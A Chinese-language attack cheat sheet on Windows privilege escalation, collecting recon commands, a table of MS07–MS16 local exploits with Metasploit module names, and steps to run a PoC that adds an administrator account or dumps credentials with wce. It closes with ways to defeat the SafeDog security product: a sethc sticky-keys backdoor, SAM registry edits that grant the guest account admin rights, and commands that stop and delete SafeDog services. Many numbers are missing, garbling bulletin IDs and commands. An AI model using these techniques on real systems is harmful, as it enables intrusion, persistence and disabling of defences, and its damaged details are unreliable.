本文收集整理一些跟提權緊密相關的資訊收集技巧和方法,以及如何在kali中搜尋可用的漏洞,最後整理了目前可供使用的一些漏洞對應msf下的子產品以及作業系統可提權的版本。
0X00 Windows提權資訊收集
1. 收集OS名稱和版本資訊
systeminfo
systeminfo | findstr /B /C:"OS 名稱" /C:"OS 版本"
2. 主機名稱和所有環境變量
主機名稱:hostname
環境變量:SET
3. 檢視使用者資訊
檢視所有使用者:net user 或者net1 user
檢視管理者使用者組:net localgroup administrators或者net1 localgroup administrators
檢視遠端終端線上使用者:query user 或者quser
4. 檢視遠端端口
(1)系統資料庫檢視
REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
查到的是16進制,需要轉換為10進制
(2)通過指令行檢視
擷取對應的PID号:tasklist /svc | find "TermService"
通過PID号查找端口:netstat -ano | find ""
片
5. 檢視網絡情況
(1)網絡配置情況:ipconfig /all
(2)路由器資訊: route print
(3)要檢視ARP緩存: arp -A
(4)檢視網絡連接配接: netstat -ano
(5)要檢視防火牆規則:
netsh firewall show config
netsh firewall show state
6. 應用程式和服務
(1)要檢視服務的程序ID:tasklist /SVC
(2)已安裝驅動程式的清單:DRIVERQUERY
(3)已經啟動Windows 服務net start
(4)檢視某服務啟動權限:sc qc TermService
(5)已安裝程式的清單:wmic product list brief
(6)檢視服務清單:wmic service list brief # Lists services
(7)檢視程序清單wmic process list brief # Lists processes
(8)檢視啟動程式清單wmic startup list brief # Lists startup items
7. 檢索敏感檔案、目錄檔案操作
dir /b/s password.txt
dir /b /s *.doc
dir /b /s *.ppt
dir /b /s *.xls
dir /b /s *. docx
dir /b /s *.xlsx
dir /b/s config.* filesystem
findstr /si password *.xml *.ini *.txt
findstr /si login *.xml *.ini *.txt
()列出d:\www的所有目錄:
for /d %i in (d:\www\*) do @echo %i
()把目前路徑下檔案夾的名字隻有-個字母的顯示出來:
for /d %i in (???) do @echo %i
()以目前目錄為搜尋路徑,把目前目錄與下面的子目錄的全部EXE檔案列出:
for /r %i in (*.exe) do @echo %i
()以指定目錄為搜尋路徑,把目前目錄與下面的子目錄的所有檔案列出
for /r "f:\freehost\hmadesign\web\" %i in (*.*) do @echo %i
()顯示a.txt裡面的内容,因為/f的作用,會讀出a.txt中:
for /f %i in (c:\.txt) do echo %i
. RAR打包
rar a -k -r -s -m3 c:\.rar d:\wwwroot
. php讀檔案
c:/php/php.exe "c:/www/admin/.php"
8.自動收集系統有用資訊腳本
for /f "delims=" %%A in ('dir /s /b %WINDIR%\system32\*htable.xsl') do set "var=%%A"
wmic process get CSName,Description,ExecutablePath,ProcessId /format:"%var%" >> out.html
wmic service get Caption,Name,PathName,ServiceType,Started,StartMode,StartName /format:"%var%" >> out.html
wmic USERACCOUNT list full /format:"%var%" >> out.html
wmic group list full /format:"%var%" >> out.html
wmic nicconfig where IPEnabled='true' get Caption,DefaultIPGateway,Description,DHCPEnabled,DHCPServer,IPAddress,IPSubnet,MACAddress /format:"%var%" >> out.html
wmic volume get Label,DeviceID,DriveLetter,FileSystem,Capacity,FreeSpace /format:"%var%" >> out.html
wmic netuse list full /format:"%var%" >> out.html
wmic qfe get Caption,Description,HotFixID,InstalledOn /format:"%var%" >> out.html
wmic startup get Caption,Command,Location,User /format:"%var%" >> out.html
wmic PRODUCT get Description,InstallDate,InstallLocation,PackageCache,Vendor,Version /format:"%var%" >> out.html
wmic os get name,version,InstallDate,LastBootUpTime,LocalDateTime,Manufacturer,RegisteredUser,ServicePackMajorVersion,SystemDirectory /format:"%var%" >> out.html
wmic Timezone get DaylightName,Description,StandardName /format:"%var%" >> out.html
0X01 Windows提權準備
我們已經知道如何高效的進行資訊收集工作,後面我們根據根據Windows-Exploit-Suggester擷取目前系統可能存在的漏洞。
通過前面的基礎指令以及本章的第二章節,可以有針對性的對目标開展提權工作,根據Windows-Exploit-Suggester擷取目前系統可能存在的漏洞。
1. 收集并編譯相關POC
2. 若作業系統有防毒軟體以及安全防護軟體,則需要對提權POC進行免殺,否則進行下一步。
3. 上傳POC
4. 有webshell或者反彈webshell來執行指令
5. 搜尋漏洞,根據關鍵字進行搜尋例如MS10-061。
(1)在百度浏覽器中搜尋“MS10-061 site:exploit-db.com”
(2)packetstormsecurity網站搜尋
https://packetstormsecurity.com/search/?q=MS16-016
(3)安全焦點,其BugTraq是一個出色的漏洞和exploit資料源,可以通過CVE編号,或者産品資訊漏洞直接搜尋。網址:http://www.securityfocus.com/bid。
0X02 使用msf平台搜尋可利用POC
-
搜尋poc
在kali中打開msf或者執行“/usr/bin/msfconsole”,在出來的指令提示符下使用指令進行搜尋:
search ms08
search ms09
search ms10
search ms11
search ms12
search ms13
search ms14
search ms15
search ms16
search ms17
-
檢視相關漏洞情況
可以通過微軟官方網站檢視漏洞對應的版本,利用方式為https://technet.microsoft.com/library/security/漏洞号,例如檢視ms08-068則其網頁打開方式為:
https://technet.microsoft.com/library/security/ms08-068,如圖2所示,如果顯示為嚴重則表明可以被利用。
0X03 實施提權
(1)直接執行木馬。
poc.exe ma.exe
(2)添加使用者
poc.exe “net user antian365 1qaz2wsx /add”
poc.exe “net localgroup administrators antian365 /add”
(3)擷取明文密碼或者哈希值
poc.exe “wce32.exe -w”
poc.exe “wce64.exe -w”
poc.exe “wce32”
0X04 相關資源下載下傳
-
Tools下載下傳
wce下載下傳:
http://www.ampliasecurity.com/research/windows-credentials-editor/
http://www.ampliasecurity.com/research/wce_v1_42beta_x32.zip
http://www.ampliasecurity.com/research/wce_v1_42beta_x64.zip
sysinternals :https://technet.microsoft.com/en-us/sysinternals/bb842062
mimikatz :http://blog.gentilkiwi.com/mimikatz
python :https://www.python.org/downloads/windows/
-
搜尋漏洞和shellcode
http://www.exploit-db.com
http://1337day.com
http://0day.today
http://www.securityfocus.com
http://seclists.org/fulldisclosure/
http://www.exploitsearch.net
http://www.securiteam.com
http://metasploit.com/modules/
http://securityreason.com
https://cxsecurity.com/exploit/
http://securitytracker.com/
0X05 Windows本地溢出漏洞對應表
Windows2003對應漏洞、編号及其影響系統及msf子產品
1. 2007年對應漏洞、編号及其影響系統及msf子產品
()KB935966 |MS07- Win2000SP4、Win2003SP1/SP2 exploit/windows/dcerpc/ms07_029_msdns_zonename
exploit/windows/smb/ms07_029_msdns_zonename
()KB937894| MS07- WinxpSP2、Win2000SP4、WinXP-x64-SP2、Win2003SP1/SP2
exploit/windows/dcerpc/ms07_065_msmq
()KB941568|MS07- Win2000SP4
exploit/windows/misc/ms07_064_sami
()KB944653|MS07- WinXPSP2、WinXP-x64-SP2、Win2003SP1/SP2
2. 2008年對應漏洞、編号及其影響系統及msf子產品
(1)KB958644 |MS08-067 Win2000SP4、WinXP-SP2/SP3、
WinXP-64-SP/SP2、Win2003SP1/SP2、Win2003-64/SP2
exploit/windows/smb/ms08_067_netapi
(2)KB 957097| MS08-068 Win2000SP4、WinXP-SP2/SP3、
WinXP-64-SP/SP2、Win2003SP1/SP2、Win2003-64/SP2
exploit/windows/smb/smb_relay
3. 2009年對應漏洞、編号及其影響系統及msf子產品
()KB952004|MS09- PR Win2003/
()KB956572|MS09-烤肉
()KB970483|MS09- IIS6
()KB971657|MS09- WinXP、Win2003提權
()KB975254|MS09- IIS5遠端溢出,Windows2000SP4,Win2003及Win2008拒絕服務。
()KB975517 |MS09- Vista、Win2008-/SP2、Win2008-/SP2
exploit/windows/smb/ms09_050_smb2_negotiate_func_index
4. 2010年對應漏洞、編号及其影響系統及msf子產品
()KB977165|MS10- Vista、Win2003--/SP2、Win2008--/SP2
exploit/windows/local/ms10_015_kitrap0d
()KB |MS10- Winxp3、Winxp64sp2、Win2003-- SP2、Win2008-- SP2
()KB2360937|MS10- Winxp3、Winxp64sp2、Win2003-- SP2
()KB2305420| MS10- Win7--、Win2008--、Win2008R2--
exploit/windows/local/ms10_092_schelevator
()KB2124261|KB2271195 MS10- IIS7
5. 2011年對應漏洞、編号及其影響系統及msf子產品
()KB2393802|MS11-
Winxp32--SP3、Win2003---SP2、Win7---SP1、 Win2008-R2--SP2
()KB2478960|MS11-
Winxp32--SP3、Win2003---SP2
()KB2507938|MS11-
Winxp32--SP3、Win2003---SP2、Win7---SP1、 Win2008-R2--SP2
()KB2566454|MS11-
Winxp32--SP3、Win2003---SP2
()KB2620712|MS11-
Winxp-SP3、Win2003-SP2、Win7--SP1、 Win2008R2--SP1
()KB2503665|MS11-
Winxp-SP3、Win2003-SP2、Win7--SP1、 Win2008R2--SP1
()KB2592799|MS11-
Winxp-SP3、Win2003-SP2
exploit/windows/local/ms11_080_afdjoinleaf
6. 2012年對應漏洞、編号及其影響系統及msf子產品
()KB2711167| KB2707511|KB2709715|MS12- sysret –pid
Winxp-SP3、Win2003-SP2、Win7--SP1、 Win2008R2--SP1、Win8--、Win2012
()KB2621440|MS12- Winxp-SP3、Win2003-SP2、Win7--SP1、 Win2008R2--SP1、
7. 2013年對應漏洞、編号及其影響系統及msf子產品
()KB2778930|MS13- Vista---SP2、Win2008---SP2、Win7---SP1、 Win2008R2--SP1、Win8--、Win2012
exploit/windows/local/ms13_005_hwnd_broadcast
()KB2840221|MS13- WinXP--SP3、WinXP--SP2、Win2003---SP2、Vista---SP2、Win2008-R2---SP2、Win7---SP1、 Win2008R2--SP1、Win8--、Win2012、Win2012R2
()KB2850851|MS13- EPATHOBJ day,WinXP--SP3、WinXP--SP2、Win2003---SP2、Vista---SP2、Win2008-R2---SP2、Win7---SP1、 Win2008R2--SP1、Win8--、Win2012
exploit/windows/local/ms13_053_schlamperei
8. 2014年對應漏洞、編号及其影響系統及msf子產品
()KB |MS14- WinXPSP3、WinXP--SP2、Win2003---sp2
exploit/windows/local/ms_ndproxy
()KB |MS14- Win2003---SP2、Vista---SP2、Win2008---SP2、Win7-R2---SP1、 Win2008R2--SP1、Win8---、Win2012、Win2012R2
exploit/windows/local/ms14_009_ie_dfsvc
()KB3000061|MS14- Win2003---SP2、Vista---SP2、Win2008-R2---SP2、Win7---SP1、 Win2008R2--SP1、Win8---、Win2012、Win2012R2
exploit/windows/local/ms14_058_track_popup_menu
()KB |MS14- Win2003---SP2
exploit/windows/local/ms14_070_tcpip_ioctl
9. 2015年對應漏洞、編号及其影響系統及msf子產品
()KB3023266|MS15- Win7---SP1、Win2008R2---SP1、 Win2008R2--SP1、Win8---、Win2012、Win2012R2
exploit/windows/local/ntapphelpcachecontrol
()KB3025421|MS15_004、Win7---SP1、Win2008R2---SP1、 Win2008R2--SP1、Win8---、Win2012、Win2012R2
exploit/windows/local/ms15_004_tswbproxy
()KB3041836|MS15-、Win2003---SP2、Vista---SP2、Win2008---SP2、Win7-R2---SP1、 Win2008R2--SP1、Win8---、Win2012、Win2012R2
exploit/windows/smb/ms15_020_shortcut_icon_dllloader
()KB3057191|MS15-
Win2003---SP2、Vista---SP2、Win2008---SP2、Win7-R2---SP1、 Win2008R2--SP1、Win8---、Win2012、Win2012R2
exploit/windows/local/ms15_051_client_copy_image
()KB3077657|MS15-
Win2003---SP2、Vista---SP2、Win2008---SP2、Win7-R2---SP1、 Win2008R2--SP1、Win8---、Win2012、Win2012R2
()KB |MS15_078
Win2003---SP2、Vista---SP2、Win2008---SP2、Win7-R2---SP1、 Win2008R2--SP1、Win8---、Win2012、Win2012R2
exploit/windows/local/ms15_078_atmfd_bof
()KB3079904|MS15-
Win2003---SP2、Vista---SP2、Win2008---SP2、Win7-R2---SP1、 Win2008R2--SP1、Win8---、Win2012、Win2012R2
exploit/windows/smb/ms15_020_shortcut_icon_dllloader
10. 2016年對應漏洞、編号及其影響系統及msf子產品
()KB3134228|MS16- Win2008、Win7、Win2012
()KB3124280|MS16- WebDAV提權漏洞,Vista---SP2、Win2008---SP2、Win7---SP1、Win2008R2--SP1、Win8.--、Win2012、Win2012R2、Win10--
exploit/windows/local/ms16_016_webdav
()KB3139914|MS16-、Vista---SP2、Win2008---SP2、Win7---SP1、Win2008R2--SP1、Win8.--、Win2012、Win2012R2、Win10--
exploit/windows/local/ms16_032_secondary_logon_handle_privesc
Windows SP2 安裝了MS10-更新檔,可用ms15_020進行溢出
Windows SP2 ( bits)安裝了MS14-更新檔可用ms15_020進行溢出
0X06 過安全狗
1. vbs法
将以下代碼儲存為vbs然後執行cscript vbs
Set o=CreateObject( "Shell.Users" )
Set z=o.create("user")
z.changePassword "1qaz2WSX12",""
z.setting("AccountType")=
2. shift後門法
copy C:\sethc.exe C:\windows\system32\sethc.exe
copy C:\windows\system32\sethc.exe C:\windows\system32\dllcache\sethc.exe
3. for循環添加帳号法
for /l %%i in (,,) do @net user temp asphxg /add&@net localgroup administrators temp /add
4. 修改系統資料庫法
administrator對應值是4,GUEST是5。
()使用net1 user guset ,将guest密碼重置為,無需過問是guest否禁用
()執行:reg export "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4" "C:\RECYCLER\1.reg"
導出administrator的系統資料庫值到某路徑,修改内容,将"V"值删除,隻留F值,将4修改為5,儲存。
()執行regedit /s C:\RECYCLER\reg 導入系統資料庫
就可以使用,guest 密碼登陸了。
5. 直接修改管理者密碼法,盡量不用這招,實在沒有辦法就用這個。
net user administrator somepwd
6. 删除與停止安全狗相關服務法
如果是system權限可以采取以下方法停止安全狗
(1)停止安全狗相關服務
net stop "Safedog Guard Center" /y
net stop "Safedog Update Center" /y
net stop "SafeDogCloudHelper" /y
(2)直接删除SafeDogGuardCenter服務
sc stop "SafeDogGuardCenter"
sc config "SafeDogGuardCenter" start= disabled
sc delete "SafeDogGuardCenter"
sc stop " SafeDogUpdateCenter"
sc config " SafeDogUpdateCenter" start= disabled
sc delete " SafeDogUpdateCenter"
sc stop " SafeDogCloudHelper"
sc config " SafeDogCloudHelper" start= disabled
sc delete " SafeDogCloudHelper"
參考連結:
http://netsecurity.51cto.com/art/201704/537105.htm
![【内網—内網轉發】——代理轉發_ew(Earthworm)代理轉發[圖]](data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=)